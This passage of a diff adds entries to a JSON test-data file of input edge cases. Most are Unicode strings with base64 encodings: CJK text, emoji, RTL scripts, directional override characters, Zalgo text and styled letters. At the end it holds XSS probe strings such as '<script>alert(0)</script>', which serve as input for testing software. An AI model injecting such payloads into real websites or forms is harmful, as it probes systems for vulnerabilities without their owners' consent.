+    "string": "찦차를 타고 온 펲시맨과 쑛다리 똠방각하",
+    "base64": "7LCm7LCo66W8IO2DgOqzoCDsmKgg7Y6y7Iuc66eo6rO8IOyRm+uLpOumrCDrmKDrsKnqsIHtlZg="
+  },
+  {
+    "category": "Strings which contain two-byte characters: can cause rendering issues or character-length issues",
+    "string": "社會科學院語學研究所",
+    "base64": "56S+5pyD56eR5a246Zmi6Kqe5a2456CU56m25omA"
+  },
+  {
+    "category": "Strings which contain two-byte characters: can cause rendering issues or character-length issues",
+    "string": "울란바토르",
+    "base64": "7Jq4656A67CU7Yag66W0"
+  },
+  {
+    "category": "Strings which contain two-byte characters: can cause rendering issues or character-length issues",
+    "string": "𠜎𠜱𠝹𠱓𠱸𠲖𠳏",
+    "base64": "8KCcjvCgnLHwoJ258KCxk/CgsbjwoLKW8KCzjw=="
+  },
+  {
+    "category": "Strings which contain two-byte letters: can cause issues with naïve UTF-16 capitalizers which think that 16 bits == 1 character",
+    "string": "𐐜 𐐔𐐇𐐝𐐀𐐡𐐇𐐓 𐐙𐐊𐐡𐐝𐐓/𐐝𐐇𐐗𐐊𐐤𐐔 𐐒𐐋𐐗 𐐒𐐌 𐐜 𐐡𐐀𐐖𐐇𐐤𐐓𐐝 𐐱𐑂 𐑄 𐐔𐐇𐐝𐐀𐐡𐐇𐐓 𐐏𐐆𐐅𐐤𐐆𐐚𐐊𐐡𐐝𐐆𐐓𐐆",
+    "base64": "8JCQnCDwkJCU8JCQh/CQkJ3wkJCA8JCQofCQkIfwkJCTIPCQkJnwkJCK8JCQofCQkJ3wkJCTL/CQkJ3wkJCH8JCQl/CQkIrwkJCk8JCQlCDwkJCS8JCQi/CQkJcg8JCQkvCQkIwg8JCQnCDwkJCh8JCQgPCQkJbwkJCH8JCQpPCQkJPwkJCdIPCQkLHwkJGCIPCQkYQg8JCQlPCQkIfwkJCd8JCQgPCQkKHwkJCH8JCQkyDwkJCP8JCQhvCQkIXwkJCk8JCQhvCQkJrwkJCK8JCQofCQkJ3wkJCG8JCQk/CQkIY="
+  },
+  {
+    "category": "𠀀          CJK Ideograph Extension B, First (U+20000)",
+    "string": "表ポあA鷗ŒéＢ逍Üßªąñ丂㐀𠀀",
+    "base64": "6KGo44Od44GCQem3l8WSw6nvvKLpgI3DnMOfwqrEhcOx5LiC45CA8KCAgA=="
+  },
+  {
+    "category": "Credit: https://twitter.com/jifa/status/625776454479970304",
+    "string": "Ⱥ",
+    "base64": "yLo="
+  },
+  {
+    "category": "Credit: https://twitter.com/jifa/status/625776454479970304",
+    "string": "Ⱦ",
+    "base64": "yL4="
+  },
+  {
+    "category": "Strings which consists of Japanese-style emoticons which are popular on the web",
+    "string": "ヽ༼ຈل͜ຈ༽ﾉ ヽ༼ຈل͜ຈ༽ﾉ",
+    "base64": "44O94Ly84LqI2YTNnOC6iOC8ve++iSDjg73gvLzguojZhM2c4LqI4Ly9776J"
+  },
+  {
+    "category": "Strings which consists of Japanese-style emoticons which are popular on the web",
+    "string": "(｡◕ ∀ ◕｡)",
+    "base64": "KO+9oeKXlSDiiIAg4peV772hKQ=="
+  },
+  {
+    "category": "Strings which consists of Japanese-style emoticons which are popular on the web",
+    "string": "｀ｨ(´∀｀∩",
+    "base64": "772A772oKMK04oiA772A4oip"
+  },
+  {
+    "category": "Strings which consists of Japanese-style emoticons which are popular on the web",
+    "string": "__ﾛ(,_,*)",
+    "base64": "X1/vvpsoLF8sKik="
+  },
+  {
+    "category": "Strings which consists of Japanese-style emoticons which are popular on the web",
+    "string": "・(￣∀￣)・:*:",
+    "base64": "44O7KO+/o+KIgO+/oynjg7s6Kjo="
+  },
+  {
+    "category": "Strings which consists of Japanese-style emoticons which are popular on the web",
+    "string": "ﾟ･✿ヾ╲(｡◕‿◕｡)╱✿･ﾟ",
+    "base64": "776f772l4py/44O+4pWyKO+9oeKXleKAv+KXle+9oSnilbHinL/vvaXvvp8="
+  },
+  {
+    "category": "Strings which consists of Japanese-style emoticons which are popular on the web",
+    "string": ",。・:*:・゜’( ☻ ω ☻ )。・:*:・゜’",
+    "base64": "LOOAguODuzoqOuODu+OCnOKAmSgg4pi7IM+JIOKYuyAp44CC44O7Oio644O744Kc4oCZ"
+  },
+  {
+    "category": "Strings which consists of Japanese-style emoticons which are popular on the web",
+    "string": "(╯°□°）╯︵ ┻━┻)",
+    "base64": "KOKVr8Kw4pahwrDvvInila/vuLUg4pS74pSB4pS7KQ=="
+  },
+  {
+    "category": "Strings which consists of Japanese-style emoticons which are popular on the web",
+    "string": "(ﾉಥ益ಥ）ﾉ﻿ ┻━┻",
+    "base64": "KO++ieCypeebiuCype+8ie++ie+7vyDilLvilIHilLs="
+  },
+  {
+    "category": "Strings which consists of Japanese-style emoticons which are popular on the web",
+    "string": "┬─┬ノ( º _ ºノ)",
+    "base64": "4pSs4pSA4pSs44OOKCDCuiBfIMK644OOKQ=="
+  },
+  {
+    "category": "Strings which consists of Japanese-style emoticons which are popular on the web",
+    "string": "( ͡° ͜ʖ ͡°)",
+    "base64": "KCDNocKwIM2cypYgzaHCsCk="
+  },
+  {
+    "category": "Strings which consists of Japanese-style emoticons which are popular on the web",
+    "string": "¯\\_(ツ)_/¯",
+    "base64": "wq9cXyjjg4QpXy/Crw=="
+  },
+  {
+    "category": "Strings which contain Emoji; should be the same behavior as two-byte characters, but not always",
+    "string": "😍",
+    "base64": "8J+YjQ=="
+  },
+  {
+    "category": "Strings which contain Emoji; should be the same behavior as two-byte characters, but not always",
+    "string": "👩🏽",
+    "base64": "8J+RqfCfj70="
+  },
+  {
+    "category": "Strings which contain Emoji; should be the same behavior as two-byte characters, but not always",
+    "string": "👨‍🦰 👨🏿‍🦰 👨‍🦱 👨🏿‍🦱 🦹🏿‍♂️",
+    "base64": "8J+RqOKAjfCfprAg8J+RqPCfj7/igI3wn6awIPCfkajigI3wn6axIPCfkajwn4+/4oCN8J+msSDwn6a58J+Pv+KAjeKZgu+4jw=="
+  },
+  {
+    "category": "Strings which contain Emoji; should be the same behavior as two-byte characters, but not always",
+    "string": "👾 🙇 💁 🙅 🙆 🙋 🙎 🙍",
+    "base64": "8J+RviDwn5mHIPCfkoEg8J+ZhSDwn5mGIPCfmYsg8J+ZjiDwn5mN"
+  },
+  {
+    "category": "Strings which contain Emoji; should be the same behavior as two-byte characters, but not always",
+    "string": "🐵 🙈 🙉 🙊",
+    "base64": "8J+QtSDwn5mIIPCfmYkg8J+Zig=="
+  },
+  {
+    "category": "Strings which contain Emoji; should be the same behavior as two-byte characters, but not always",
+    "string": "❤️ 💔 💌 💕 💞 💓 💗 💖 💘 💝 💟 💜 💛 💚 💙",
+    "base64": "4p2k77iPIPCfkpQg8J+SjCDwn5KVIPCfkp4g8J+SkyDwn5KXIPCfkpYg8J+SmCDwn5KdIPCfkp8g8J+SnCDwn5KbIPCfkpog8J+SmQ=="
+  },
+  {
+    "category": "Strings which contain Emoji; should be the same behavior as two-byte characters, but not always",
+    "string": "✋🏿 💪🏿 👐🏿 🙌🏿 👏🏿 🙏🏿",
+    "base64": "4pyL8J+PvyDwn5Kq8J+PvyDwn5GQ8J+PvyDwn5mM8J+PvyDwn5GP8J+PvyDwn5mP8J+Pvw=="
+  },
+  {
+    "category": "Strings which contain Emoji; should be the same behavior as two-byte characters, but not always",
+    "string": "👨‍👩‍👦 👨‍👩‍👧‍👦 👨‍👨‍👦 👩‍👩‍👧 👨‍👦 👨‍👧‍👦 👩‍👦 👩‍👧‍👦",
+    "base64": "8J+RqOKAjfCfkanigI3wn5GmIPCfkajigI3wn5Gp4oCN8J+Rp+KAjfCfkaYg8J+RqOKAjfCfkajigI3wn5GmIPCfkanigI3wn5Gp4oCN8J+RpyDwn5Go4oCN8J+RpiDwn5Go4oCN8J+Rp+KAjfCfkaYg8J+RqeKAjfCfkaYg8J+RqeKAjfCfkafigI3wn5Gm"
+  },
+  {
+    "category": "Strings which contain Emoji; should be the same behavior as two-byte characters, but not always",
+    "string": "🚾 🆒 🆓 🆕 🆖 🆗 🆙 🏧",
+    "base64": "8J+aviDwn4aSIPCfhpMg8J+GlSDwn4aWIPCfhpcg8J+GmSDwn4+n"
+  },
+  {
+    "category": "Strings which contain Emoji; should be the same behavior as two-byte characters, but not always",
+    "string": "0️⃣ 1️⃣ 2️⃣ 3️⃣ 4️⃣ 5️⃣ 6️⃣ 7️⃣ 8️⃣ 9️⃣ 🔟",
+    "base64": "MO+4j+KDoyAx77iP4oOjIDLvuI/ig6MgM++4j+KDoyA077iP4oOjIDXvuI/ig6MgNu+4j+KDoyA377iP4oOjIDjvuI/ig6MgOe+4j+KDoyDwn5Sf"
+  },
+  {
+    "category": "fonts, and have a number of special behaviors",
+    "string": "🇺🇸🇷🇺🇸 🇦🇫🇦🇲🇸",
+    "base64": "8J+HuvCfh7jwn4e38J+HuvCfh7gg8J+HpvCfh6vwn4em8J+HsvCfh7g="
+  },
+  {
+    "category": "fonts, and have a number of special behaviors",
+    "string": "🇺🇸🇷🇺🇸🇦🇫🇦🇲",
+    "base64": "8J+HuvCfh7jwn4e38J+HuvCfh7jwn4em8J+Hq/Cfh6bwn4ey"
+  },
+  {
+    "category": "fonts, and have a number of special behaviors",
+    "string": "🇺🇸🇷🇺🇸🇦",
+    "base64": "8J+HuvCfh7jwn4e38J+HuvCfh7jwn4em"
+  },
+  {
+    "category": "Strings which contain unicode numbers; if the code is localized, it should see the input as numeric",
+    "string": "１２３",
+    "base64": "77yR77yS77yT"
+  },
+  {
+    "category": "Strings which contain unicode numbers; if the code is localized, it should see the input as numeric",
+    "string": "١٢٣",
+    "base64": "2aHZotmj"
+  },
+  {
+    "category": "Strings which contain text that should be rendered RTL if possible (e.g. Arabic, Hebrew)",
+    "string": "ثم نفس سقطت وبالتحديد،, جزيرتي باستخدام أن دنو. إذ هنا؟ الستار وتنصيب كان. أهّل ايطاليا، بريطانيا-فرنسا قد أخذ. سليمان، إتفاقية بين ما, يذكر الحدود أي بعد, معاملة بولندا، الإطلاق عل إيو.",
+    "base64": "2KvZhSDZhtmB2LMg2LPZgti32Kog2YjYqNin2YTYqtit2K/Zitiv2IwsINis2LLZitix2KrZiiDYqNin2LPYqtiu2K/Yp9mFINij2YYg2K/ZhtmILiDYpdiwINmH2YbYp9ifINin2YTYs9iq2KfYsSDZiNiq2YbYtdmK2Kgg2YPYp9mGLiDYo9mH2ZHZhCDYp9mK2LfYp9mE2YrYp9iMINio2LHZiti32KfZhtmK2Kct2YHYsdmG2LPYpyDZgtivINij2K7YsC4g2LPZhNmK2YXYp9mG2Iwg2KXYqtmB2KfZgtmK2Kkg2KjZitmGINmF2KcsINmK2LDZg9ixINin2YTYrdiv2YjYryDYo9mKINio2LnYrywg2YXYudin2YXZhNipINio2YjZhNmG2K/Yp9iMINin2YTYpdi32YTYp9mCINi52YQg2KXZitmILg=="
+  },
+  {
+    "category": "Strings which contain text that should be rendered RTL if possible (e.g. Arabic, Hebrew)",
+    "string": "בְּרֵאשִׁית, בָּרָא אֱלֹהִים, אֵת הַשָּׁמַיִם, וְאֵת הָאָרֶץ",
+    "base64": "15HWsNa816jWtdeQ16nWtNeB15nXqiwg15HWuNa816jWuNeQINeQ1rHXnNa515TWtNeZ150sINeQ1rXXqiDXlNa316nWuNa814HXnta315nWtNedLCDXldaw15DWtdeqINeU1rjXkNa416jWttel"
+  },
+  {
+    "category": "Strings which contain text that should be rendered RTL if possible (e.g. Arabic, Hebrew)",
+    "string": "הָיְתָהtestالصفحات التّحول",
+    "base64": "15TWuNeZ1rDXqta415R0ZXN02KfZhNi12YHYrdin2Kog2KfZhNiq2ZHYrdmI2YQ="
+  },
+  {
+    "category": "Strings which contain text that should be rendered RTL if possible (e.g. Arabic, Hebrew)",
+    "string": "﷽",
+    "base64": "77e9"
+  },
+  {
+    "category": "Strings which contain text that should be rendered RTL if possible (e.g. Arabic, Hebrew)",
+    "string": "ﷺ",
+    "base64": "77e6"
+  },
+  {
+    "category": "Strings which contain text that should be rendered RTL if possible (e.g. Arabic, Hebrew)",
+    "string": "مُنَاقَشَةُ سُبُلِ اِسْتِخْدَامِ اللُّغَةِ فِي النُّظُمِ الْقَائِمَةِ وَفِيم يَخُصَّ التَّطْبِيقَاتُ الْحاسُوبِيَّةُ،",
+    "base64": "2YXZj9mG2Y7Yp9mC2Y7YtNmO2KnZjyDYs9mP2KjZj9mE2ZAg2KfZkNiz2ZLYqtmQ2K7Zktiv2Y7Yp9mF2ZAg2KfZhNmE2Y/Zkdi62Y7YqdmQINmB2ZDZiiDYp9mE2YbZj9mR2LjZj9mF2ZAg2KfZhNmS2YLZjtin2KbZkNmF2Y7YqdmQINmI2Y7ZgdmQ2YrZhSDZitmO2K7Zj9i12Y7ZkSDYp9mE2KrZjtmR2LfZktio2ZDZitmC2Y7Yp9iq2Y8g2KfZhNmS2K3Yp9iz2Y/ZiNio2ZDZitmO2ZHYqdmP2Iw="
+  },
+  {
+    "category": "Strings which contain text that should be rendered RTL if possible (e.g. Arabic, Hebrew)",
+    "string": "الكل في المجمو عة (5)",
+    "base64": "2KfZhNmD2YQg2YHZiiDYp9mE2YXYrNmF2Ygg2LnYqSAoNSk="
+  },
+  {
+    "category": "The only unicode alphabet to use a space which isn't empty but should still act like a space.",
+    "string": "᚛ᚄᚓᚐᚋᚒᚄ ᚑᚄᚂᚑᚏᚅ᚜",
+    "base64": "4Zqb4ZqE4ZqT4ZqQ4ZqL4ZqS4ZqE4ZqA4ZqR4ZqE4ZqC4ZqR4ZqP4ZqF4Zqc"
+  },
+  {
+    "category": "The only unicode alphabet to use a space which isn't empty but should still act like a space.",
+    "string": "᚛                 ᚜",
+    "base64": "4Zqb4ZqA4ZqA4ZqA4ZqA4ZqA4ZqA4ZqA4ZqA4ZqA4ZqA4ZqA4ZqA4ZqA4ZqA4ZqA4ZqA4ZqA4Zqc"
+  },
+  {
+    "category": "Strings which contain unicode with unusual properties (e.g. Right-to-left override) (c.f. http://www.unicode.org/charts/PDF/U2000.pdf)",
+    "string": "‪‪test‪",
+    "base64": "4oCq4oCqdGVzdOKAqg=="
+  },
+  {
+    "category": "Strings which contain unicode with unusual properties (e.g. Right-to-left override) (c.f. http://www.unicode.org/charts/PDF/U2000.pdf)",
+    "string": "‫test‫",
+    "base64": "4oCrdGVzdOKAqw=="
+  },
+  {
+    "category": "Strings which contain unicode with unusual properties (e.g. Right-to-left override) (c.f. http://www.unicode.org/charts/PDF/U2000.pdf)",
+    "string": "test",
+    "base64": "dGVzdA=="
+  },
+  {
+    "category": "Strings which contain unicode with unusual properties (e.g. Right-to-left override) (c.f. http://www.unicode.org/charts/PDF/U2000.pdf)",
+    "string": "test⁠test‫",
+    "base64": "dGVzdOKBoHRlc3TigKs="
+  },
+  {
+    "category": "Strings which contain unicode with unusual properties (e.g. Right-to-left override) (c.f. http://www.unicode.org/charts/PDF/U2000.pdf)",
+    "string": "⁦test⁧",
+    "base64": "4oGmdGVzdOKBpw=="
+  },
+  {
+    "category": "Strings which contain \"corrupted\" text. The corruption will not appear in non-HTML text, however. (via http://www.eeemo.net)",
+    "string": "Ṱ̺̺̕o͞ ̷i̲̬͇̪͙n̝̗͕v̟̜̘̦͟o̶̙̰̠kè͚̮̺̪̹̱̤ ̖t̝͕̳̣̻̪͞h̼͓̲̦̳̘̲e͇̣̰̦̬͎ ̢̼̻̱̘h͚͎͙̜̣̲ͅi̦̲̣̰̤v̻͍e̺̭̳̪̰-m̢iͅn̖̺̞̲̯̰d̵̼̟͙̩̼̘̳ ̞̥̱̳̭r̛̗̘e͙p͠r̼̞̻̭̗e̺̠̣͟s̘͇̳͍̝͉e͉̥̯̞̲͚̬͜ǹ̬͎͎̟̖͇̤t͍̬̤͓̼̭͘ͅi̪̱n͠g̴͉ ͏͉ͅc̬̟h͡a̫̻̯͘o̫̟̖͍̙̝͉s̗̦̲.̨̹͈̣",
+    "base64": "4bmwzLrMusyVb82eIMy3acyyzKzNh8yqzZluzJ3Ml82VdsyfzJzMmMymzZ9vzLbMmcywzKBrw6jNmsyuzLrMqsy5zLHMpCDMlnTMnc2VzLPMo8y7zKrNnmjMvM2TzLLMpsyzzJjMsmXNh8yjzLDMpsyszY4gzKLMvMy7zLHMmGjNms2OzZnMnMyjzLLNhWnMpsyyzKPMsMykdsy7zY1lzLrMrcyzzKrMsC1tzKJpzYVuzJbMusyezLLMr8ywZMy1zLzMn82ZzKnMvMyYzLMgzJ7MpcyxzLPMrXLMm8yXzJhlzZlwzaByzLzMnsy7zK3Ml2XMusygzKPNn3PMmM2HzLPNjcydzYllzYnMpcyvzJ7Mss2azKzNnMe5zKzNjs2OzJ/Mls2HzKR0zY3MrMykzZPMvMytzZjNhWnMqsyxbs2gZ8y0zYkgzY/Nic2FY8yszJ9ozaFhzKvMu8yvzZhvzKvMn8yWzY3MmcydzYlzzJfMpsyyLsyozLnNiMyj"
+  },
+  {
+    "category": "Strings which contain \"corrupted\" text. The corruption will not appear in non-HTML text, however. (via http://www.eeemo.net)",
+    "string": "̡͓̞ͅI̗̘̦͝n͇͇͙v̮̫ok̲̫̙͈i̖͙̭̹̠̞n̡̻̮̣̺g̲͈͙̭͙̬͎ ̰t͔̦h̞̲e̢̤ ͍̬̲͖f̴̘͕̣è͖ẹ̥̩l͖͔͚i͓͚̦͠n͖͍̗͓̳̮g͍ ̨o͚̪͡f̘̣̬ ̖̘͖̟͙̮c҉͔̫͖͓͇͖ͅh̵̤̣͚͔á̗̼͕ͅo̼̣̥s̱͈̺̖̦̻͢.̛̖̞̠̫̰",
+    "base64": "zKHNk8yezYVJzJfMmMymzZ1uzYfNh82ZdsyuzKtva8yyzKvMmc2IacyWzZnMrcy5zKDMnm7Mocy7zK7Mo8y6Z8yyzYjNmcytzZnMrM2OIMywdM2UzKZozJ7MsmXMosykIM2NzKzMss2WZsy0zJjNlcyjw6jNluG6ucylzKlszZbNlM2aac2TzZrMps2gbs2WzY3Ml82TzLPMrmfNjSDMqG/NmsyqzaFmzJjMo8ysIMyWzJjNlsyfzZnMrmPSic2UzKvNls2TzYfNls2FaMy1zKTMo82azZTDocyXzLzNlc2Fb8y8zKPMpXPMsc2IzLrMlsymzLvNoi7Mm8yWzJ7MoMyrzLA="
+  },
+  {
+    "category": "Strings which contain \"corrupted\" text. The corruption will not appear in non-HTML text, however. (via http://www.eeemo.net)",
+    "string": "̗̺͖̹̯͓Ṯ̤͍̥͇͈h̲́e͏͓̼̗̙̼̣͔ ͇̜̱̠͓͍ͅN͕͠e̗̱z̘̝̜̺͙p̤̺̹͍̯͚e̠̻̠͜r̨̤͍̺̖͔̖̖d̠̟̭̬̝͟i̦͖̩͓͔̤a̠̗̬͉̙n͚͜ ̻̞̰͚ͅh̵͉i̳̞v̢͇ḙ͎͟-҉̭̩̼͔m̤̭̫i͕͇̝̦n̗͙ḍ̟ ̯̲͕͞ǫ̟̯̰̲͙̻̝f ̪̰̰̗̖̭̘͘c̦͍̲̞͍̩̙ḥ͚a̮͎̟̙͜ơ̩̹͎s̤.̝̝ ҉Z̡̖̜͖̰̣͉̜a͖̰͙̬͡l̲̫̳͍̩g̡̟̼̱͚̞̬ͅo̗͜.̟",
+    "base64": "zJfMus2WzLnMr82T4bmuzKTNjcylzYfNiGjMssyBZc2PzZPMvMyXzJnMvMyjzZQgzYfMnMyxzKDNk82NzYVOzZXNoGXMl8yxesyYzJ3MnMy6zZlwzKTMusy5zY3Mr82aZcygzLvMoM2ccsyozKTNjcy6zJbNlMyWzJZkzKDMn8ytzKzMnc2facymzZbMqc2TzZTMpGHMoMyXzKzNicyZbs2azZwgzLvMnsywzZrNhWjMtc2JacyzzJ52zKLNh+G4mc2OzZ8t0onMrcypzLzNlG3MpMytzKtpzZXNh8ydzKZuzJfNmeG4jcyfIMyvzLLNlc2ex6vMn8yvzLDMss2ZzLvMnWYgzKrMsMywzJfMlsytzJjNmGPMps2NzLLMns2NzKnMmeG4pc2aYcyuzY7Mn8yZzZzGocypzLnNjnPMpC7MncydINKJWsyhzJbMnM2WzLDMo82JzJxhzZbMsM2ZzKzNoWzMssyrzLPNjcypZ8yhzJ/MvMyxzZrMnsyszYVvzJfNnC7Mnw=="
+  },
+  {
+    "category": "Strings which contain \"corrupted\" text. The corruption will not appear in non-HTML text, however. (via http://www.eeemo.net)",
+    "string": "̦H̬̤̗̤͝e͜ ̜̥̝̻͍̟́w̕h̖̯͓o̝͙̖͎̱̮ ҉̺̙̞̟͈W̷̼̭a̺̪͍į͈͕̭͙̯̜t̶̼̮s̘͙͖̕ ̠̫̠B̻͍͙͉̳ͅe̵h̵̬͇̫͙i̹͓̳̳̮͎̫̕n͟d̴̪̜̖ ̰͉̩͇͙̲͞ͅT͖̼͓̪͢h͏͓̮̻e̬̝̟ͅ ̤̹̝W͙̞̝͔͇͝ͅa͏͓͔̹̼̣l̴͔̰̤̟͔ḽ̫.͕",
+    "base64": "zKZIzKzMpMyXzKTNnWXNnCDMnMylzJ3Mu82NzJ/MgXfMlWjMlsyvzZNvzJ3NmcyWzY7MscyuINKJzLrMmcyezJ/NiFfMt8y8zK1hzLrMqs2NxK/NiM2VzK3NmcyvzJx0zLbMvMyuc8yYzZnNlsyVIMygzKvMoELMu82NzZnNicyzzYVlzLVozLXMrM2HzKvNmWnMuc2TzLPMs8yuzY7Mq8yVbs2fZMy0zKrMnMyWIMywzYnMqc2HzZnMss2ezYVUzZbMvM2TzKrNomjNj82TzK7Mu2XMrMydzJ/NhSDMpMy5zJ1XzZnMnsydzZTNh82dzYVhzY/Nk82UzLnMvMyjbMy0zZTMsMykzJ/NlOG4vcyrLs2V"
+  },
+  {
+    "category": "Strings which contain \"corrupted\" text. The corruption will not appear in non-HTML text, however. (via http://www.eeemo.net)",
+    "string": "Z̮̞̠͙͔ͅḀ̗̞͈̻̗Ḷ͙͎̯̹̞͓G̻O̭̗̮",
+    "base64": "WsyuzJ7MoM2ZzZTNheG4gMyXzJ7NiMy7zJfhuLbNmc2OzK/MucyezZNHzLtPzK3Ml8yu"
+  },
+  {
+    "category": "Strings which contain unicode with an \"upsidedown\" effect (via http://www.upsidedowntext.com)",
+    "string": "˙ɐnbᴉlɐ ɐuƃɐɯ ǝɹolop ʇǝ ǝɹoqɐl ʇn ʇunpᴉpᴉɔuᴉ ɹodɯǝʇ poɯsnᴉǝ op pǝs 'ʇᴉlǝ ƃuᴉɔsᴉdᴉpɐ ɹnʇǝʇɔǝsuoɔ 'ʇǝɯɐ ʇᴉs ɹolop ɯnsdᴉ ɯǝɹo˥",
+    "base64": "y5nJkG5i4bSJbMmQIMmQdcaDyZDJryDHncm5b2xvcCDKh8edIMedyblvccmQbCDKh24gyod1bnDhtIlw4bSJyZR14bSJIMm5b2TJr8edyocgcG/Jr3Nu4bSJx50gb3AgcMedcyAnyofhtIlsx50gxoN14bSJyZRz4bSJZOG0iXDJkCDJuW7Kh8edyofJlMedc3VvyZQgJ8qHx53Jr8mQIMqH4bSJcyDJuW9sb3Agya9uc2ThtIkgya/Hncm5b8ul"
+  },
+  {
+    "category": "Strings which contain unicode with an \"upsidedown\" effect (via http://www.upsidedowntext.com)",
+    "string": "00˙Ɩ$-",
+    "base64": "MDDLmcaWJC0="
+  },
+  {
+    "category": "Strings which contain bold/italic/etc. versions of normal characters",
+    "string": "Ｔｈｅ ｑｕｉｃｋ ｂｒｏｗｎ ｆｏｘ ｊｕｍｐｓ ｏｖｅｒ ｔｈｅ ｌａｚｙ ｄｏｇ",
+    "base64": "77y0772I772FIO+9ke+9le+9ie+9g++9iyDvvYLvvZLvvY/vvZfvvY4g772G772P772YIO+9iu+9le+9je+9kO+9kyDvvY/vvZbvvYXvvZIg772U772I772FIO+9jO+9ge+9mu+9mSDvvYTvvY/vvYc="
+  },
+  {
+    "category": "Strings which contain bold/italic/etc. versions of normal characters",
+    "string": "𝐓𝐡𝐞 𝐪𝐮𝐢𝐜𝐤 𝐛𝐫𝐨𝐰𝐧 𝐟𝐨𝐱 𝐣𝐮𝐦𝐩𝐬 𝐨𝐯𝐞𝐫 𝐭𝐡𝐞 𝐥𝐚𝐳𝐲 𝐝𝐨𝐠",
+    "base64": "8J2Qk/CdkKHwnZCeIPCdkKrwnZCu8J2QovCdkJzwnZCkIPCdkJvwnZCr8J2QqPCdkLDwnZCnIPCdkJ/wnZCo8J2QsSDwnZCj8J2QrvCdkKbwnZCp8J2QrCDwnZCo8J2Qr/CdkJ7wnZCrIPCdkK3wnZCh8J2QniDwnZCl8J2QmvCdkLPwnZCyIPCdkJ3wnZCo8J2QoA=="
+  },
+  {
+    "category": "Strings which contain bold/italic/etc. versions of normal characters",
+    "string": "𝕿𝖍𝖊 𝖖𝖚𝖎𝖈𝖐 𝖇𝖗𝖔𝖜𝖓 𝖋𝖔𝖝 𝖏𝖚𝖒𝖕𝖘 𝖔𝖛𝖊𝖗 𝖙𝖍𝖊 𝖑𝖆𝖟𝖞 𝖉𝖔𝖌",
+    "base64": "8J2Vv/Cdlo3wnZaKIPCdlpbwnZaa8J2WjvCdlojwnZaQIPCdlofwnZaX8J2WlPCdlpzwnZaTIPCdlovwnZaU8J2WnSDwnZaP8J2WmvCdlpLwnZaV8J2WmCDwnZaU8J2Wm/CdlorwnZaXIPCdlpnwnZaN8J2WiiDwnZaR8J2WhvCdlp/wnZaeIPCdlonwnZaU8J2WjA=="
+  },
+  {
+    "category": "Strings which contain bold/italic/etc. versions of normal characters",
+    "string": "𝑻𝒉𝒆 𝒒𝒖𝒊𝒄𝒌 𝒃𝒓𝒐𝒘𝒏 𝒇𝒐𝒙 𝒋𝒖𝒎𝒑𝒔 𝒐𝒗𝒆𝒓 𝒕𝒉𝒆 𝒍𝒂𝒛𝒚 𝒅𝒐𝒈",
+    "base64": "8J2Ru/CdkonwnZKGIPCdkpLwnZKW8J2SivCdkoTwnZKMIPCdkoPwnZKT8J2SkPCdkpjwnZKPIPCdkofwnZKQ8J2SmSDwnZKL8J2SlvCdko7wnZKR8J2SlCDwnZKQ8J2Sl/CdkobwnZKTIPCdkpXwnZKJ8J2ShiDwnZKN8J2SgvCdkpvwnZKaIPCdkoXwnZKQ8J2SiA=="
+  },
+  {
+    "category": "Strings which contain bold/italic/etc. versions of normal characters",
+    "string": "𝓣𝓱𝓮 𝓺𝓾𝓲𝓬𝓴 𝓫𝓻𝓸𝔀𝓷 𝓯𝓸𝔁 𝓳𝓾𝓶𝓹𝓼 𝓸𝓿𝓮𝓻 𝓽𝓱𝓮 𝓵𝓪𝔃𝔂 𝓭𝓸𝓰",
+    "base64": "8J2To/Cdk7HwnZOuIPCdk7rwnZO+8J2TsvCdk6zwnZO0IPCdk6vwnZO78J2TuPCdlIDwnZO3IPCdk6/wnZO48J2UgSDwnZOz8J2TvvCdk7bwnZO58J2TvCDwnZO48J2Tv/Cdk67wnZO7IPCdk73wnZOx8J2TriDwnZO18J2TqvCdlIPwnZSCIPCdk63wnZO48J2TsA=="
+  },
+  {
+    "category": "Strings which contain bold/italic/etc. versions of normal characters",
+    "string": "𝕋𝕙𝕖 𝕢𝕦𝕚𝕔𝕜 𝕓𝕣𝕠𝕨𝕟 𝕗𝕠𝕩 𝕛𝕦𝕞𝕡𝕤 𝕠𝕧𝕖𝕣 𝕥𝕙𝕖 𝕝𝕒𝕫𝕪 𝕕𝕠𝕘",
+    "base64": "8J2Vi/CdlZnwnZWWIPCdlaLwnZWm8J2VmvCdlZTwnZWcIPCdlZPwnZWj8J2VoPCdlajwnZWfIPCdlZfwnZWg8J2VqSDwnZWb8J2VpvCdlZ7wnZWh8J2VpCDwnZWg8J2Vp/CdlZbwnZWjIPCdlaXwnZWZ8J2VliDwnZWd8J2VkvCdlavwnZWqIPCdlZXwnZWg8J2VmA=="
+  },
+  {
+    "category": "Strings which contain bold/italic/etc. versions of normal characters",
+    "string": "𝚃𝚑𝚎 𝚚𝚞𝚒𝚌𝚔 𝚋𝚛𝚘𝚠𝚗 𝚏𝚘𝚡 𝚓𝚞𝚖𝚙𝚜 𝚘𝚟𝚎𝚛 𝚝𝚑𝚎 𝚕𝚊𝚣𝚢 𝚍𝚘𝚐",
+    "base64": "8J2ag/CdmpHwnZqOIPCdmprwnZqe8J2akvCdmozwnZqUIPCdmovwnZqb8J2amPCdmqDwnZqXIPCdmo/wnZqY8J2aoSDwnZqT8J2anvCdmpbwnZqZ8J2anCDwnZqY8J2an/Cdmo7wnZqbIPCdmp3wnZqR8J2ajiDwnZqV8J2aivCdmqPwnZqiIPCdmo3wnZqY8J2akA=="
+  },
+  {
+    "category": "Strings which contain bold/italic/etc. versions of normal characters",
+    "string": "⒯⒣⒠ ⒬⒰⒤⒞⒦ ⒝⒭⒪⒲⒩ ⒡⒪⒳ ⒥⒰⒨⒫⒮ ⒪⒱⒠⒭ ⒯⒣⒠ ⒧⒜⒵⒴ ⒟⒪⒢",
+    "base64": "4pKv4pKj4pKgIOKSrOKSsOKSpOKSnuKSpiDikp3ikq3ikqrikrLikqkg4pKh4pKq4pKzIOKSpeKSsOKSqOKSq+KSriDikqrikrHikqDikq0g4pKv4pKj4pKgIOKSp+KSnOKSteKStCDikp/ikqrikqI="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<script>alert(0)</script>",
+    "base64": "PHNjcmlwdD5hbGVydCgwKTwvc2NyaXB0Pg=="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "&lt;script&gt;alert(&#39;1&#39;);&lt;/script&gt;",
+    "base64": "Jmx0O3NjcmlwdCZndDthbGVydCgmIzM5OzEmIzM5Oyk7Jmx0Oy9zY3JpcHQmZ3Q7"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
